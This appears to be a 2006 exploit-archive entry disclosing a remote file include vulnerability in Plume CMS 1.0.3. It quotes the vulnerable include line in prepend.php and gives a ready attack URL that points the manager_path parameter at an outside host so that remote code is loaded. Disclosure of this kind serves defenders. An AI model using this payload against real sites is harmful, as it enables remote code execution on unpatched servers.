Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
# Published : 2006-05-26
# Author : beford
# Previous Title : MiniNuke 2.x (create an admin) Remote SQL Injection Exploit
# Next Title : qjForum (member.asp) SQL Injection Vulnerability

Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet

# www.Syue.com [2006-05-26]